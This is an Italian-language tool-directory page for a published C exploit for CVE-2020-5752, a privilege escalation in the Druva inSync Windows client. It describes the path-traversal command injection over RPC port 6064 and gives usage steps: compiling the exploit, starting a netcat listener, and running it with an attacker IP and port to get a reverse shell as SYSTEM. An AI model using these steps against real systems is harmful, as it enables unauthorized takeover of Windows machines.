Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2020-5752 — Escalation dei privilegi locali per Druva | Kitploit
Strumenti/GitHubGitHub/x0rbeexd/cve-2020-5752
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneBinary Exploitation
GitHubx0rbeexd/cve-2020-5752

CVE-2020-5752

Escalation dei privilegi locali per Druva

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2020-5752: Druva inSync - Escalation locale dei privilegi

Un exploit basato su C per il Druva inSync Windows Client (v6.6.3 e versioni precedenti). L'applicazione espone un servizio RPC sulla porta 6064 vulnerabile a un'iniezione di comandi tramite path traversal. Ciò consente a un utente locale di eseguire comandi arbitrari come NT AUTHORITY\SYSTEM.

Dettagli della vulnerabilità

  • CVE: 2020-5752
  • Testato su: Windows 10 (x64)
  • Livello di privilegio: Escalation locale dei privilegi (LPE)

Utilizzo

1. Compilazione

Usa gcc (MinGW) per compilare il codice sorgente:

root@kitploit:~
gcc exploit.c -o exploit.exe -lws2_32

2. Preparazione

Posiziona una copia di nc.exe in una directory accessibile dall'account SYSTEM (ad es., C:\Windows\Tasks).

3. Esecuzione

Avvia un listener sulla macchina dell'attaccante:

root@kitploit:~

nc -lvnp 4444
Run the exploit on the target Windows machine:
root@kitploit:~
exploit.exe <Attacker_IP> <Attacker_Port> <Path_to_NC>
Example:
exploit.exe 10.10.10.5 4444 C:\Windows\Tasks\nc.exe

Esclusione di responsabilità

Questo strumento è solo a scopo educativo. L'uso non autorizzato su sistemi di cui non si ha il permesso di testare è illegale

Scarica lo strumento